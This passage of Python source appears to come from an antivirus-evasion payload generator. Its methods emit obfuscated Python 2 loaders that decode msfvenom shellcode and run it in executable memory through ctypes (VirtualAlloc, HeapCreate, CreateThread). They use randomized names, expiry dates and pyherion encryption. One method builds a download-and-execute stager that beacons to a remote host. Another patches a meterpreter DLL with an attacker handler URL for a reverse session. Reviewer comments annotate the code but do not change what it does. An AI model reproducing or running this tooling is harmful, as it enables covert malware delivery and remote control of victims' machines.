            payload_code += rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payload_code += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
            # NOTE(review): crypters.pyherion here vs encryption.pyherion elsewhere
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = crypters.pyherion(payload_code)
            return payload_code
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Extra Variables
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            HeapVar = helpers.randomString()
            # Create Payload File
            payload_code = 'import ctypes\n'
            payload_code += 'from string import maketrans\n'
            payload_code += 'from datetime import datetime\n'
            payload_code += 'from datetime import date\n\n'
            payload_code += RandToday + ' = datetime.now()\n'
            payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(sub_scheme) + '\"\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            # Duplicate bytearray line, as in the non-expiring heap variant
            payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += '\t' + shellcode_variable_name + ' = bytearray(' + subbed_shellcode_variable_name + '.decode(\"string_escape\"))\n'
            payload_code += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + shellcode_variable_name + ') * 2),ctypes.c_int(0))\n'
            payload_code += '\t' + rand_ptr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + shellcode_variable_name + ')))\n'
            payload_code += '\t' + rand_buf + ' = (ctypes.c_char * len(' + shellcode_variable_name + ')).from_buffer(' + shellcode_variable_name + ')\n'
            payload_code += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + rand_ptr + '),' + rand_buf + ',ctypes.c_int(len(' + shellcode_variable_name + ')))\n'
            payload_code += '\t' + rand_ht + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + rand_ptr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payload_code += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + rand_ht + '),ctypes.c_int(-1))\n'
            # NOTE(review): crypters.pyherion here vs encryption.pyherion elsewhere
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = crypters.pyherion(payload_code)
            return payload_code
    else:
        if self.required_options["expire_payload"][0].lower() == "x":
            #Additional random variable names (rand_reverse_shell is unused)
            rand_reverse_shell = helpers.randomString()
            rand_memory_shell = helpers.randomString()
            rand_shellcode = helpers.randomString()
            # Create Payload File: the unescaped str is placed in a ctypes
            # string buffer and called directly via a CFUNCTYPE cast
            payload_code = 'from ctypes import *\n'
            payload_code += 'from string import maketrans\n'
            payload_code += rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(sub_scheme) + '\"\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
            payload_code += rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
            payload_code += rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
            payload_code += rand_shellcode + '()'
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Extra Variables
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            #Additional random variable names (rand_reverse_shell is unused)
            rand_reverse_shell = helpers.randomString()
            rand_memory_shell = helpers.randomString()
            rand_shellcode = helpers.randomString()
            # Create Payload File
            payload_code = 'from ctypes import *\n'
            payload_code += 'from string import maketrans\n'
            payload_code += 'from datetime import datetime\n'
            payload_code += 'from datetime import date\n\n'
            payload_code += RandToday + ' = datetime.now()\n'
            payload_code += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            payload_code += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            payload_code += '\t' + rand_decoded_letter + ' = "%s"\n' % decode_with_this
            payload_code += '\t' + rand_correct_letter + ' = "%s"\n' % encode_with_this
            payload_code += '\t' + rand_sub_scheme + ' = maketrans(' + rand_decoded_letter + ', ' + rand_correct_letter + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = \"' + Shellcode.translate(sub_scheme) + '\"\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.translate(' + rand_sub_scheme + ')\n'
            payload_code += '\t' + subbed_shellcode_variable_name + ' = ' + subbed_shellcode_variable_name + '.decode(\"string_escape\")\n'
            payload_code += '\t' + rand_memory_shell + ' = create_string_buffer(' + subbed_shellcode_variable_name + ', len(' + subbed_shellcode_variable_name + '))\n'
            payload_code += '\t' + rand_shellcode + ' = cast(' + rand_memory_shell + ', CFUNCTYPE(c_void_p))\n'
            payload_code += '\t' + rand_shellcode + '()'
            if self.required_options["use_pyherion"][0].lower() == "y":
                payload_code = encryption.pyherion(payload_code)
            return payload_code
def generate(self):
    """Emit the source of a Python 2 download-and-execute stager.

    The generated script fetches a raw blob from
    ``http://DOWNLOAD_HOST:DOWNLOAD_PORT/DOWNLOAD_NAME`` with ``urllib2``
    and hands it to an in-process ctypes injector
    (VirtualAlloc / VirtualLock / RtlMoveMemory / CreateThread).
    With ``BEACON == 'y'`` the fetch is repeated every ``BEACON_SECONDS``
    on a daemon thread and the main thread idles forever; with
    ``USE_PYHERION == 'y'`` the finished source is passed through
    ``encryption.pyherion()`` before being returned.

    Returns:
        str: the stager source. Every identifier in it comes from
        ``helpers.randomString()``, so two calls never yield the same text.

    Raises:
        NameError: if ``BEACON`` is anything other than ``'n'`` or ``'y'``,
        because ``global_vars`` is only bound in those two branches.
    """
    # urllib2 exists only on Python 2, so the emitted script is Python 2 code.
    # ``signal`` is imported by the generated script but never referenced.
    imports = "import sys; import urllib2; import ctypes; import time; import signal; import threading\n"
    # randomized names for the four functions and the retry flag of the
    # generated script
    inject_func = helpers.randomString()
    getexec_func = helpers.randomString()
    main_func = helpers.randomString()
    beaconthr_func = helpers.randomString()
    retry_var = helpers.randomString()
    # NOTE(review): no fallback branch -- any other BEACON value leaves
    # ``global_vars`` unbound and the ``+=`` below raises NameError.
    if self.required_options["BEACON"][0].lower() == 'n':
        global_vars = "%s = False" % retry_var
    elif self.required_options["BEACON"][0].lower() == 'y':
        global_vars = "%s = True" % retry_var
    # beacon interval and the shared urllib2 opener are emitted unconditionally;
    # BEACON_SECONDS is interpolated verbatim as a Python literal
    interval_var = helpers.randomString()
    opener_var = helpers.randomString()
    global_vars += "\n%s = %s" % (interval_var, self.required_options["BEACON_SECONDS"][0])
    global_vars += "\n%s = urllib2.build_opener()\n" % (opener_var)
    shellcode_var = helpers.randomString()
    ptr_var = helpers.randomString()
    ht_var = helpers.randomString()
    buff_var = helpers.randomString()
    # Injector: allocate an RWX region (0x3000 = MEM_COMMIT|MEM_RESERVE,
    # 0x40 = PAGE_EXECUTE_READWRITE), pin it, copy the blob in, start a
    # thread on it and block until that thread exits (-1 = INFINITE).
    # This call sequence is the canonical ctypes-injection pattern.
    inject = "def %s(%s):" % (inject_func, shellcode_var)
    inject += "\n\t%s = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(%s)),ctypes.c_int(0x3000),ctypes.c_int(0x40))" % (ptr_var, shellcode_var)
    inject += "\n\tctypes.windll.kernel32.VirtualLock(ctypes.c_int(%s), ctypes.c_int(len(%s)))" % (ptr_var, shellcode_var)
    inject += "\n\t%s = (ctypes.c_char * len(%s)).from_buffer(%s)" % (buff_var, shellcode_var, shellcode_var)
    inject += "\n\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(%s), %s, ctypes.c_int(len(%s)))" % (ptr_var, buff_var, shellcode_var)
    inject += "\n\t%s = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(%s),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))" % (ht_var, ptr_var)
    inject += "\n\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(%s),ctypes.c_int(-1))\n" % ht_var
    # fresh names for the fetch function; ``shellcode_var`` is rebound here,
    # which is fine because the injector above already captured the old one
    # as its parameter name.  ``thread_name2`` is never used.
    url_var = helpers.randomString()
    shellcode_var = helpers.randomString()
    info_var = helpers.randomString()
    thread_var = helpers.randomString()
    thread_name = helpers.randomString()
    thread_name2 = helpers.randomString()
    # Fetch-and-run: plain HTTP GET, whole body taken as the blob, every
    # error swallowed.  There is no TLS and no integrity check, so the
    # request and the blob are fully visible to network monitoring.
    getexec = "def %s(%s):" % (getexec_func, url_var)
    getexec += "\n\ttry:"
    getexec += "\n\t\t%s = %s.open(%s)" % (info_var, opener_var, url_var)
    getexec += "\n\t\t%s = %s.read()" % (shellcode_var, info_var)
    getexec += "\n\t\t%s = bytearray(%s)" % (shellcode_var, shellcode_var)
    getexec += "\n\t\t%s(%s)" % (inject_func, shellcode_var)
    getexec += "\n\texcept Exception:"
    getexec += "\n\t\tpass\n"
    # Beacon loop: sleep, then spawn a daemon thread that re-runs the fetch.
    url_var = helpers.randomString()
    beaconthr = "def %s(%s):" % (beaconthr_func, url_var)
    beaconthr += "\n\twhile True:"
    beaconthr += "\n\t\ttime.sleep(%s)" % interval_var
    beaconthr += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, getexec_func, url_var)
    beaconthr += "\n\t\t%s.setDaemon(True)" % thread_var
    beaconthr += "\n\t\t%s.start()\n" % thread_var
    # Entry point: build the URL from the module options, optionally start
    # the beacon thread, always do one immediate fetch.
    main = "def %s():" % main_func
    main += "\n\t%s = 'http://%s:%s/%s'" % (url_var, self.required_options['DOWNLOAD_HOST'][0], self.required_options['DOWNLOAD_PORT'][0], self.required_options['DOWNLOAD_NAME'][0])
    main += "\n\tif %s is True:" % retry_var
    main += "\n\t\t%s = threading.Thread(name='%s', target=%s, args=(%s,))" % (thread_var, thread_name, beaconthr_func, url_var)
    main += "\n\t\t%s.setDaemon(True)" % thread_var
    main += "\n\t\t%s.start()" % thread_var
    main += "\n\t%s(%s)" % (getexec_func, url_var)
    # keep the process alive so the daemon beacon thread is not torn down
    if self.required_options["BEACON"][0].lower() == 'y':
        main += "\n\twhile True:"
        main += "\n\t\ttime.sleep(0.1)"
    main += "\nif __name__ == '__main__':"
    main += "\n\t%s()" % main_func
    PayloadCode = imports + global_vars + inject + getexec + beaconthr + main
    if self.required_options["USE_PYHERION"][0].lower() == "y":
        PayloadCode = encryption.pyherion(PayloadCode)
    return PayloadCode
def generate(self):
    """Build a Python 2 loader that carries a patched meterpreter DLL inline.

    The DLL returned by ``helpers.selfcontained_patch()`` is patched in
    place (header, user agent, transport, handler URL, two timeouts),
    compressed with ``helpers.deflate()`` and embedded as a string literal
    in the emitted source.  ``inject_method == "void"`` emits a loader that
    casts the inflated buffer to a function pointer; any other value emits
    the VirtualAlloc / RtlMoveMemory / CreateThread variant.
    ``use_pyherion == "y"`` wraps the finished source with
    ``encryption.pyherion()``.

    Returns:
        str: the loader source.

    Raises:
        ValueError: from ``str.index`` if any of the expected markers is
        missing from the DLL, so an unexpected DLL build aborts here rather
        than producing a half-patched loader.
    """
    # lambda function used for patching the metsvc.dll: overwrite the bytes
    # at offset ``ind`` with ``s`` without changing the total length
    dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]
    # patch the metsrv.dll header
    meterpreterDll, headerPatch = helpers.selfcontained_patch()
    meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)
    # patch in the default user agent string (NUL-terminated, like the marker)
    userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
    userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
    meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)
    # turn off SSL: the transport marker is rewritten to plain HTTP, so the
    # resulting session is cleartext on the wire
    sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
    sslString = "METERPRETER_TRANSPORT_HTTP\x00"
    meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)
    # replace the URL/port of the handler; the 256-byte placeholder of X's
    # leaves room for the http:// URL built here, which ends with a
    # checksum segment plus a 16-char random tail and a NUL
    urlIndex = meterpreterDll.index("https://" + ("X" * 256))
    urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
    meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
    # replace the expiration timeout (little-endian marker 0xb64be661) with
    # 604800 seconds, i.e. seven days.  The original comment said 300; that
    # figure belongs to the communication timeout below.
    expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
    expirationTimeout = struct.pack('<I', 604800)
    meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)
    # replace the communication timeout (marker 0xaf79257f) with 300 seconds
    communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
    communicationTimeout = struct.pack('<I', 300)
    meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)
    # compress/base64 encode the dll -- helpers.deflate() is opaque here; the
    # emitted loader base64-decodes it and inflates with wbits=-15 (raw
    # deflate), so presumably that is the format it returns -- verify in helpers
    compressedDll = helpers.deflate(meterpreterDll)
    # actually build out the payload
    payloadCode = ""
    # traditional void pointer injection
    if self.required_options["inject_method"][0].lower() == "void":
        # doing void * cast: the inflated DLL bytes are cast straight to a
        # CFUNCTYPE and called, with no separate executable allocation
        payloadCode += "from ctypes import *\nimport base64,zlib\n"
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randVarName = helpers.randomString()
        # deflate function (really: base64-decode then inflate)
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        # fresh names for the caller; the local used inside the inflate
        # function above keeps the previous randVarName
        randVarName = helpers.randomString()
        randFuncName = helpers.randomString()
        payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
        payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
        payloadCode += randFuncName+"()\n"
    # VirtualAlloc() injection
    else:
        payloadCode += 'import ctypes,base64,zlib\n'
        randInflateFuncName = helpers.randomString()
        randb64stringName = helpers.randomString()
        randVarName = helpers.randomString()
        randPtr = helpers.randomString()
        randBuf = helpers.randomString()
        randHt = helpers.randomString()
        # deflate function (same shape as in the void branch)
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
        payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
        payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"
        # NOTE: randVarName is reused here, so the module-level bytearray and
        # the inflate function's local share a name; harmless because the
        # local is scoped to the function
        payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
        # RWX allocation (0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 =
        # PAGE_EXECUTE_READWRITE), copy, new thread, wait forever (-1)
        payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
        payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
        payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
        payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
        payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'
    if self.required_options["use_pyherion"][0].lower() == "y":
        payloadCode = encryption.pyherion(payloadCode)
    return payloadCode
def generate(self):
    """Emit a Python 2 script that embeds base64 shellcode and runs it.

    Six near-identical templates are selected by two options:

    * ``inject_method``: ``"virtual"`` (VirtualAlloc RWX region),
      ``"heap"`` (HeapCreate with an executable heap), anything else
      (``create_string_buffer`` cast to a function pointer).
    * ``expire_payload``: ``"x"`` for no expiry; otherwise an integer number
      of days.  The dated variants wrap the whole body in
      ``if datetime.now() < <expiry>:`` evaluated from the local clock at
      run time.  The base64 shellcode literal is still present in the file
      either way, so the check only gates execution, not the artifact.

    The shellcode comes from ``self.shellcode.generate()`` and is decoded at
    run time with ``str.decode('base64')`` / ``decode("string_escape")``,
    which only exist on Python 2.  ``use_pyherion == "y"`` wraps the result
    with ``encryption.pyherion()``.

    Returns:
        str: the generated source.

    Raises:
        ValueError: from ``int()`` when ``expire_payload`` is neither
        ``"x"`` nor an integer string.
    """
    if self.required_options["inject_method"][0].lower() == "virtual":
        if self.required_options["expire_payload"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandT = helpers.randomString()
            PayloadCode = 'import ctypes\n'
            PayloadCode += 'import base64\n'
            PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
            # 0x3000 = MEM_COMMIT|MEM_RESERVE, 0x40 = PAGE_EXECUTE_READWRITE;
            # -1 in WaitForSingleObject is INFINITE
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandT = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            PayloadCode = 'import ctypes\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            # expiredate is "YYYY-MM-DD"; [2:] drops the century to match "%y-%m-%d"
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
            PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(' + ShellcodeVariableName + ')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += '\t' + 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += '\t' + 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
    # Not "virtual": "heap" takes the next branch, every other value falls
    # through to the else (function-pointer cast) below.
    if self.required_options["inject_method"][0].lower() == "heap":
        if self.required_options["expire_payload"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandT = helpers.randomString()
            HeapVar = helpers.randomString()
            PayloadCode = 'import ctypes\n'
            PayloadCode += 'import base64\n'
            PayloadCode += RandT + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
            # 0x00040000 = HEAP_CREATE_ENABLE_EXECUTE (private executable heap,
            # sized at twice the shellcode); 0x00000008 = HEAP_ZERO_MEMORY
            PayloadCode += HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
            PayloadCode += RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandPtr = helpers.randomString()
            RandBuf = helpers.randomString()
            RandHt = helpers.randomString()
            RandT = helpers.randomString()
            HeapVar = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            PayloadCode = 'import ctypes\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            # same century-stripping as the virtual/dated variant above
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
            PayloadCode += 'if ' + RandToday + ' < ' + RandExpire + ':\n'
            PayloadCode += '\t' + RandT + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += '\t' + ShellcodeVariableName + " = bytearray(" + RandT + ".decode('base64','strict').decode(\"string_escape\"))\n"
            PayloadCode += '\t' + HeapVar + ' = ctypes.windll.kernel32.HeapCreate(ctypes.c_int(0x00040000),ctypes.c_int(len(' + ShellcodeVariableName + ') * 2),ctypes.c_int(0))\n'
            PayloadCode += '\t' + RandPtr + ' = ctypes.windll.kernel32.HeapAlloc(ctypes.c_int(' + HeapVar + '),ctypes.c_int(0x00000008),ctypes.c_int(len( ' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandBuf + ' = (ctypes.c_char * len(' + ShellcodeVariableName + ')).from_buffer(' + ShellcodeVariableName + ')\n'
            PayloadCode += '\tctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
            PayloadCode += '\t' + RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            PayloadCode += '\tctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
    else:
        # Function-pointer cast variant: no explicit allocation API is called;
        # the decoded bytes go into a ctypes string buffer that is cast to a
        # CFUNCTYPE and invoked.  RandReverseShell is generated but unused.
        if self.required_options["expire_payload"][0].lower() == "x":
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()
            DecodedShellcode = helpers.randomString()
            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)
            PayloadCode = 'from ctypes import *\n'
            PayloadCode += 'import base64\n'
            PayloadCode += ShellcodeVariableName + " = \"" + EncodedShellcode + "\"\n"
            PayloadCode += DecodedShellcode + " = bytearray(" + ShellcodeVariableName + ".decode('base64','strict').decode(\"string_escape\"))\n"
            PayloadCode += RandMemoryShell + ' = create_string_buffer(str(' + DecodedShellcode + '), len(str(' + DecodedShellcode + ')))\n'
            PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
            PayloadCode += RandShellcode + '()'
            if self.required_options["use_pyherion"][0].lower() == "y":
                PayloadCode = encryption.pyherion(PayloadCode)
            return PayloadCode
        else:
            # Get our current date and add number of days to the date
            todaysdate = date.today()
            expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
            # Generate Shellcode Using msfvenom
            Shellcode = self.shellcode.generate()
            # Generate Random Variable Names
            ShellcodeVariableName = helpers.randomString()
            RandShellcode = helpers.randomString()
            RandReverseShell = helpers.randomString()
            RandMemoryShell = helpers.randomString()
            DecodedShellcode = helpers.randomString()
            RandToday = helpers.randomString()
            RandExpire = helpers.randomString()
            # Base64 Encode Shellcode
            EncodedShellcode = base64.b64encode(Shellcode)
            PayloadCode = 'from ctypes import *\n'
            PayloadCode += 'import base64\n'
            PayloadCode += 'from datetime import datetime\n'
            PayloadCode += 'from datetime import date\n\n'
            PayloadCode += RandToday + ' = datetime.now()\n'
            # same century-stripping as the dated variants above
            PayloadCode += RandExpire + ' = datetime.strptime(\"' + expiredate[2:] + '\",\"%y-%m-%d\") \n'
